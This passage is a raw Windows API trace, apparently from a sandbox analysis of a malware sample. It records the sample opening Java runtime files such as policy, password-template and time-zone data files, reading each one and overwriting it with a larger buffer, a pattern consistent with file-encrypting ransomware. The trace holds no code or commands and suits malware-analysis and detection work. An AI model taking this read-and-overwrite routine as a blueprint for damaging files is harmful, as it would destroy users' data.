lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0132.508] CloseHandle (hObject=0x204) returned 1 [0132.508] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.password.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0132.509] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.509] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xb28 [0132.509] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.509] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.510] ReleaseMutex (hMutex=0x168) returned 1 [0132.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.password.template", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0132.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.password.template", cchWideChar=27, lpMultiByteStr=0x1f8fcfc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jmxremote.password.template", lpUsedDefaultChar=0x0) returned 27 [0132.510] ReadFile (in: hFile=0x204, lpBuffer=0x1e983d8, nNumberOfBytesToRead=0xb28, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e983d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xb28, lpOverlapped=0x0) returned 1 [0132.515] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0132.515] WriteFile (in: hFile=0x204, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x10b0, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x10b0, lpOverlapped=0x0) returned 1 [0132.516] CloseHandle (hObject=0x204) returned 1 [0132.516] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfontj2d.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.519] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.519] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2899 [0132.519] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.519] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.519] ReleaseMutex (hMutex=0x168) returned 1 [0132.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfontj2d.properties", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0132.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="psfontj2d.properties", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="psfontj2d.properties", lpUsedDefaultChar=0x0) returned 20 [0132.519] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0132.524] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1899 [0132.524] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0132.525] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1899 [0132.525] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0132.525] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0132.526] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0132.526] CloseHandle (hObject=0x1cc) returned 1 [0132.526] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javaws.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.527] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.527] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x62 [0132.527] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.527] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.527] ReleaseMutex (hMutex=0x168) returned 1 [0132.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.policy", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.policy", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaws.policy", lpUsedDefaultChar=0x0) returned 13 [0132.527] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f56778, nNumberOfBytesToRead=0x62, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56778*, lpNumberOfBytesRead=0x2d5f2bc*=0x62, lpOverlapped=0x0) returned 1 [0132.529] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0132.529] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5ea, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5ea, lpOverlapped=0x0) returned 1 [0132.529] CloseHandle (hObject=0x1cc) returned 1 [0132.529] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Algiers" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\algiers"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.530] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.530] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x14d [0132.530] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.530] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.530] ReleaseMutex (hMutex=0x168) returned 1 [0132.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Algiers", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0132.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Algiers", cchWideChar=7, lpMultiByteStr=0x1f7accc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Algiers", lpUsedDefaultChar=0x0) returned 7 [0132.531] ReadFile (in: hFile=0x1cc, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x14d, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x14d, lpOverlapped=0x0) returned 1 [0132.532] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0132.532] WriteFile (in: hFile=0x1cc, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x6d5, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6d5, lpOverlapped=0x0) returned 1 [0132.532] CloseHandle (hObject=0x1cc) returned 1 [0132.533] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bujumbura"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0132.533] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.533] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1b [0132.533] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0132.533] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0132.533] ReleaseMutex (hMutex=0x168) returned 1 [0132.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bujumbura", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0132.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bujumbura", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bujumbura", lpUsedDefaultChar=0x0) returned 9 [0132.534] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0132.535] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0132.980] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0132.980] CloseHandle (hObject=0x1cc) returned 1 [0132.980] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Douala" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\douala"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.772] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.772] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0135.772] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.772] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.772] ReleaseMutex (hMutex=0x168) returned 1 [0135.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Douala", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0135.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Douala", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Douala", lpUsedDefaultChar=0x0) returned 6 [0135.773] ReadFile (in: hFile=0x20c, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0135.774] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0135.774] WriteFile (in: hFile=0x20c, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0135.774] CloseHandle (hObject=0x20c) returned 1 [0135.774] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\khartoum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.930] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.930] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x151 [0135.930] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.930] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.930] ReleaseMutex (hMutex=0x168) returned 1 [0135.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Khartoum", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Khartoum", cchWideChar=8, lpMultiByteStr=0x1f7358c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Khartoum", lpUsedDefaultChar=0x0) returned 8 [0135.931] ReadFile (in: hFile=0x20c, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x151, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x151, lpOverlapped=0x0) returned 1 [0135.932] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0135.932] WriteFile (in: hFile=0x20c, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x6d9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6d9, lpOverlapped=0x0) returned 1 [0135.933] CloseHandle (hObject=0x20c) returned 1 [0135.933] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lusaka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lusaka"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.934] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.934] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x41 [0135.934] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.934] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.934] ReleaseMutex (hMutex=0x168) returned 1 [0135.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lusaka", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0135.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lusaka", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lusaka", lpUsedDefaultChar=0x0) returned 6 [0135.934] ReadFile (in: hFile=0x20c, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2d5f2bc*=0x41, lpOverlapped=0x0) returned 1 [0135.935] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0135.935] WriteFile (in: hFile=0x20c, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0135.936] CloseHandle (hObject=0x20c) returned 1 [0135.936] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ndjamena"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.937] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.937] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x59 [0135.937] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.937] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.937] ReleaseMutex (hMutex=0x168) returned 1 [0135.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ndjamena", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ndjamena", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ndjamena", lpUsedDefaultChar=0x0) returned 8 [0135.937] ReadFile (in: hFile=0x20c, lpBuffer=0x1fbafe0, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbafe0*, lpNumberOfBytesRead=0x2d5f2bc*=0x59, lpOverlapped=0x0) returned 1 [0135.939] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0135.939] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0135.939] CloseHandle (hObject=0x20c) returned 1 [0135.939] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\windhoek"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.940] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.940] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x338 [0135.940] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.940] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.940] ReleaseMutex (hMutex=0x168) returned 1 [0135.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windhoek", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windhoek", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windhoek", lpUsedDefaultChar=0x0) returned 8 [0135.940] ReadFile (in: hFile=0x20c, lpBuffer=0x1e96468, nNumberOfBytesToRead=0x338, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e96468*, lpNumberOfBytesRead=0x2d5f2bc*=0x338, lpOverlapped=0x0) returned 1 [0135.984] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0135.985] WriteFile (in: hFile=0x20c, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x8c0, lpOverlapped=0x0) returned 1 [0135.985] CloseHandle (hObject=0x20c) returned 1 [0135.989] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\Cordoba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\cordoba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0135.991] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0135.991] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: 